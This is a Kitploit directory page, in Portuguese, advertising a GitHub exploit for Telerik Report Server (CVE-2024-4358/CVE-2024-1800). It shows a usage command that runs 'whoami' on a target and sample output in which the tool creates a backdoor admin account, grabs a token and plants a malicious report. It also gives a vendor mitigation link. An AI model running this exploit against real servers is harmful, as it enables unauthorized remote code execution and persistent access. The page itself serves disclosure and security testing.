Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-4358 — Exploração de execução remota de código pré-autenticada para o Telerik Report Server (CVE-2024-4358/CVE-2024-1800) com bypass de autenticação e geração de payload de desserialização. | Kitploit
Ferramentas/GitHubGitHub/harydhk7/cve-2024-4358
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAutenticaçãoAprendizado e Educação
GitHubharydhk7/cve-2024-4358

CVE-2024-4358

Exploração de execução remota de código pré-autenticada para o Telerik Report Server (CVE-2024-4358/CVE-2024-1800) com bypass de autenticação e geração de payload de desserialização.

Ver Repositório
há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2024-4358 / CVE-2024-1800

Cadeia de exploração de desserialização e bypass de autenticação do Telerik Report Server para CVE-2024-4358/CVE-2024-1800

Análise Técnica

Uma análise de causa raiz da vulnerabilidade pode ser encontrada no meu blog

Uso

root@kitploit:~
python CVE-2024-4358.py --target http://192.168.253.128:83 -c "whoami"

(^_^) Progress Telerik Report Server pre-authenticated RCE (CVE-2024-4358/CVE-2024-1800) || Sina Kheirkhah (@SinSinology) of Summoning Team (@SummoningTeam)
(*) random backdoor username: oelycslyun
(*) random backdoor password: cqgnacxljo
(*) Attempting to bypass authentication
(+) Authentication bypass was successful, backdoor account created
(+) Saving credentials to credentials.txt
(+) Successfully authenticated as oelycslyun with password cqgnacxljo
(*) got token: zfCch_LNv0PyKfe7eBDYKXV70IOotwNQ2p82aX-JHIMCisVnTW9PWWYUKljhcRw5alubNOg_gXoHT6-hJk4VO-jGZuzmisLIi5A
(*) Generated random report name: qvwdycugmc
(*) Creating malicious report under name qvwdycugmc
(*) Deserialization exploit finished

Mitigações

Atualize para a versão mais recente ou mitigue seguindo as instruções do Progress Advisory

  • https://docs.telerik.com/report-server/knowledge-base/registration-auth-bypass-cve-2024-4358

créditos vão para -> /sinsinology

Siga-nos no Twitter para as últimas pesquisas de segurança:

  • SinSinology
  • SummoningTeam

Aviso Legal

Este software foi criado exclusivamente para fins de pesquisa acadêmica e para o desenvolvimento de técnicas defensivas eficazes, e não se destina a ser usado para atacar sistemas, exceto quando explicitamente autorizado. Os mantenedores do projeto não são responsáveis pelo uso indevido do software. Use com responsabilidade.

Baixar ferramenta